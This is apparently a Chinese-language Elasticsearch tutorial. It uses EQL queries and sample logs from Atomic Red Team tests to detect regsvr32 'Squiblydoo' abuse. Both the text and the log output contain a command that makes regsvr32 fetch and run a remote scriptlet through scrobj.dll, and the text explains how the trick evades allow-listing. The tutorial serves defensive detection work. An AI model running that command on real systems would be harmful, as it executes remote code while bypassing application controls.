Elasticsearch:EQL 入门 - 使用 EQL 检测威胁
EQL 的全名是Event Query Language (EQL)。事件查询语言(EQL)是一种用于基于事件的时间序列数据(例如日志,指标和跟踪)的查询语言。EQL 在 Elastic Security 中被广泛使用。EQL 的优点EQL使你可以表达事件之间的关系。许多查询语言允许您匹配单个事件。 EQL 使你可以匹配不同事件类别和时间跨度的一系列事件。EQL的学习曲线很低。EQL语法看起来像其
EQL 的全名是 Event Query Language (EQL)。事件查询语言(EQL)是一种用于基于事件的时间序列数据(例如日志,指标和跟踪)的查询语言。EQL 在 Elastic Security 中被广泛使用。
EQL 的优点
- EQL 使你可以表达事件之间的关系。
许多查询语言允许您匹配单个事件。 EQL 使你可以匹配不同事件类别和时间跨度的一系列事件。
- EQL 的学习曲线很低。
EQL 语法看起来像其他常见查询语言,例如 SQL。 EQL 使你可以直观地编写和读取查询,从而可以进行快速,迭代的搜索。
- EQL 设计用于安全用例。
尽管你可以将其用于任何基于事件的数据,但我们创建了 EQL 来进行威胁搜寻。 EQL不仅支持危害指标(IOC)搜索,而且可以描述超出 IOC 范围的活动。
必要的字段
要运行 EQL 搜索,搜索到的数据流或索引必须包含时间戳和事件类别字段。 默认情况下,EQL 使用 Elastic 通用模式(ECS)中的 @timestam p和 event.category 字段。 要使用其他时间戳记或事件类别字段,请参阅指定时间戳记或事件类别字段。
提示:使用 EQL 不需要任何 schema,但我们建议使用 ECS。 默认情况下,EQL 搜索旨在与核心 ECS 字段一起使用。
EQL 查询是什么样子的?
使用 EQL 搜索 API 运行基本的 EQL 查询。 如果启用了 Elasticsearch 安全功能,那么你必须对目标数据流,索引或索引别名具有读取索引特权。
GET /my-index-000001/_eql/search
{
"query": """
process where process.name == "regsvr32.exe"
"""
}
默认情况下,基本 EQL 查询在 hits.events 属性中返回最近的10个匹配事件。 这些命中按时间戳排序,自 Unix epoch 以来以毫秒为单位递增。
使用 size 参数可以获取较小或较大的匹配:
GET /my-index-000001/_eql/search
{
"query": """
process where process.name == "regsvr32.exe"
""",
"size": 50
}
使用 EQL 来检测威胁
警告:此功能处于 beta 版本,可能会更改。 该设计和代码不如正式的 GA 功能成熟,并且按原样提供,不提供任何担保。 Beta 功能不受官方 GA 功能的支持 SLA 约束。
接下来,我们将使用一个具体的例子来展示如何使用 EQL 语言来进行威胁检测。本示例教程说明了如何使用 EQL 检测安全威胁和其他可疑行为。 在这种情况下,你需要负责检测 Windows 事件日志中的 regsvr32 滥用情况。
regsvr32.exe 是一个内置的命令行实用程序,用于在 Windows 中注册 .dll 库。 作为本机工具,regsvr32.exe 具有受信任的状态,从而使它可以绕过大多数允许列表软件和脚本阻止程序。 有权访问用户命令行的攻击者可以使用 regsvr32.exe 通过 .dll 库运行恶意脚本,即使在其他情况下也不允许这些脚本运行。
regsvr32 滥用的一种常见变体是 Squfullydoo 攻击。 在 Squfullydoo 攻击中,regsvr32.exe 命令使用 scrobj.dll 库注册并运行远程脚本。 这些命令通常如下所示:
"regsvr32.exe /s /u /i:<script-url> scrobj.dll"
准备数据
如果你阅读了我之前的练习 “Elastic:Elastic Security 入门”,那么你将知道如何把安全数据采集到 Elasticsearch 中。本教程使用来自 Atomic Red Team 的测试数据集,其中包括模仿 Squibledoo 攻击的事件。 数据已映射到 Elastic 通用架构(ECS)字段。
我们执行如下的操作:
1)下载 normalized-T1117-AtomicRed-regsvr32.json。
2)使用 bulk API 为数据建立索引:
curl -H "Content-Type: application/json" -XPOST "localhost:9200/my-index-000001/_bulk?pretty&refresh" --data-binary "@normalized-T1117-AtomicRed-regsvr32.json"
3)使用 cat index API 验证数据是否已被索引:
GET /_cat/indices/my-index-000001?v=true&h=health,status,index,docs.count
如果我们操作正确的话,那么上面命令的响应将会显示 docs.count 为 150:
health status index docs.count
yellow open my-index-000001 150
我们需要在 Kibana 的 console 中运行上面的命令。在接下来的练习中,我们将使用 EQL 来对刚才已经导入的数据进行查询。
获取 regsvr32 事件的计数
首先,获取与 regsvr32.exe 进程关联的事件数:
GET /my-index-000001/_eql/search?filter_path=-hits.events (1)
{
"query": """
any where process.name == "regsvr32.exe" (2)
""",
"size": 200 (3)
}
在上面的查询中,解释如下:
- ?filter_path=-hits.events 从响应中排除 hits.events 属性。 此搜索仅用于获取事件计数,而不是匹配事件的列表。
- 匹配任何进程名称为 regsvr32.exe 的事件。
- 最多返回 200 个匹配事件的匹配。
上面的查询的结果是:
{
"is_partial" : false,
"is_running" : false,
"took" : 2,
"timed_out" : false,
"hits" : {
"total" : {
"value" : 143,
"relation" : "eq"
}
}
}
我们看到有 143 个结果。
检查命令行参数
regsvr32.exe 进程与143个事件相关联。 但是如何首先调用 regsvr32.exe? 谁调用的? regsvr32.exe 是一个命令行实用程序。 将结果缩小到使用命令行的进程:
GET /my-index-000001/_eql/search
{
"query": """
process where process.name == "regsvr32.exe" and process.command_line.keyword != null
"""
}
该查询将一个事件与创建的 event.type 相匹配,指示 regsvr32.exe 进程的开始。 根据事件的 process.command_line 值,regsvr32.exe 使用 scrobj.dll 注册了脚本 RegSvr32.sct。 这符合 Squibledoo 攻击的行为。
{
"is_partial" : false,
"is_running" : false,
"took" : 1,
"timed_out" : false,
"hits" : {
"total" : {
"value" : 1,
"relation" : "eq"
},
"events" : [
{
"_index" : "my-index-000001",
"_id" : "QOgYTXcBt_FAPjaSltOk",
"_source" : {
"process" : {
"parent" : {
"name" : "cmd.exe",
"entity_id" : "{42FC7E13-CBCB-5C05-0000-0010AA385401}",
"executable" : """C:\Windows\System32\cmd.exe"""
},
"name" : "regsvr32.exe",
"pid" : 2012,
"entity_id" : "{42FC7E13-CBCB-5C05-0000-0010A0395401}",
"command_line" : "regsvr32.exe /s /u /i:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1117/RegSvr32.sct scrobj.dll",
"executable" : """C:\Windows\System32\regsvr32.exe""",
"ppid" : 2652
},
"logon_id" : 217055,
"@timestamp" : 131883573237130000,
"event" : {
"category" : "process",
"type" : "creation"
},
"user" : {
"full_name" : "bob",
"domain" : "ART-DESKTOP",
"id" : """ART-DESKTOP\bob"""
}
}
}
]
}
}
检查恶意脚本加载
检查 regsvr32.exe 以后是否加载 scrobj.dll 库:
GET /my-index-000001/_eql/search
{
"query": """
library where process.name == "regsvr32.exe" and dll.name == "scrobj.dll"
"""
}
该查询与事件匹配,确认已加载 scrobj.dll。
{
"is_partial" : false,
"is_running" : false,
"took" : 1,
"timed_out" : false,
"hits" : {
"total" : {
"value" : 1,
"relation" : "eq"
},
"events" : [
{
"_index" : "my-index-000001",
"_id" : "YOgYTXcBt_FAPjaSltOl",
"_source" : {
"process" : {
"name" : "regsvr32.exe",
"pid" : 2012,
"entity_id" : "{42FC7E13-CBCB-5C05-0000-0010A0395401}",
"executable" : """C:\Windows\System32\regsvr32.exe"""
},
"dll" : {
"path" : """C:\Windows\System32\scrobj.dll""",
"name" : "scrobj.dll"
},
"@timestamp" : 131883573237450016,
"event" : {
"category" : "library"
}
}
}
]
}
}
确定成功的可能性
在许多情况下,攻击者使用恶意脚本连接到远程服务器或下载其他文件。 使用 EQL 序列查询来检查以下一系列事件:
- regsvr32.exe 进程
- 通过相同的进程加载 scrobj.dll 库
- 同一过程中的任何网络事件
根据上一个响应中看到的命令行值,你可以期望找到一个匹配项。 但是,此查询并非针对该特定命令而设计。 取而代之的是,它寻找一种可疑行为的模式,这种模式足以检测出相似的威胁。
GET /my-index-000001/_eql/search
{
"query": """
sequence by process.pid
[process where process.name == "regsvr32.exe"]
[library where dll.name == "scrobj.dll"]
[network where true]
"""
}
该查询与 sequence 匹配,表明攻击可能成功。
{
"is_partial" : false,
"is_running" : false,
"took" : 6,
"timed_out" : false,
"hits" : {
"total" : {
"value" : 1,
"relation" : "eq"
},
"sequences" : [
{
"join_keys" : [
2012
],
"events" : [
{
"_index" : "my-index-000001",
"_id" : "QOgYTXcBt_FAPjaSltOk",
"_source" : {
"process" : {
"parent" : {
"name" : "cmd.exe",
"entity_id" : "{42FC7E13-CBCB-5C05-0000-0010AA385401}",
"executable" : """C:\Windows\System32\cmd.exe"""
},
"name" : "regsvr32.exe",
"pid" : 2012,
"entity_id" : "{42FC7E13-CBCB-5C05-0000-0010A0395401}",
"command_line" : "regsvr32.exe /s /u /i:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1117/RegSvr32.sct scrobj.dll",
"executable" : """C:\Windows\System32\regsvr32.exe""",
"ppid" : 2652
},
"logon_id" : 217055,
"@timestamp" : 131883573237130000,
"event" : {
"category" : "process",
"type" : "creation"
},
"user" : {
"full_name" : "bob",
"domain" : "ART-DESKTOP",
"id" : """ART-DESKTOP\bob"""
}
}
},
{
"_index" : "my-index-000001",
"_id" : "YOgYTXcBt_FAPjaSltOl",
"_source" : {
"process" : {
"name" : "regsvr32.exe",
"pid" : 2012,
"entity_id" : "{42FC7E13-CBCB-5C05-0000-0010A0395401}",
"executable" : """C:\Windows\System32\regsvr32.exe"""
},
"dll" : {
"path" : """C:\Windows\System32\scrobj.dll""",
"name" : "scrobj.dll"
},
"@timestamp" : 131883573237450016,
"event" : {
"category" : "library"
}
}
},
{
"_index" : "my-index-000001",
"_id" : "zugYTXcBt_FAPjaSltOl",
"_source" : {
"process" : {
"name" : "regsvr32.exe",
"pid" : 2012,
"entity_id" : "{42FC7E13-CBCB-5C05-0000-0010A0395401}",
"executable" : """C:\Windows\System32\regsvr32.exe"""
},
"destination" : {
"address" : "151.101.48.133",
"port" : "443"
},
"source" : {
"address" : "192.168.162.134",
"port" : "50505"
},
"network" : {
"direction" : "outbound",
"protocol" : "tcp"
},
"@timestamp" : 131883573238680000,
"event" : {
"category" : "network"
},
"user" : {
"full_name" : "bob",
"domain" : "ART-DESKTOP",
"id" : """ART-DESKTOP\bob"""
}
}
}
]
}
]
}
}
从上面返回的三个事件中,我们可以看到他们发生的时间(@timestamp):
131883573237130000
131883573237450016
131883573238680000
也就是说安装 asending 的时间方式进行排序的。上的检查是严格地按照事件发生的顺序进行排序的,也就是一个 sequence 检查。
进一步阅读 “Elasticsearch:为 Elastic Security 创建定制的 Detection rules”
更多推荐
所有评论(0)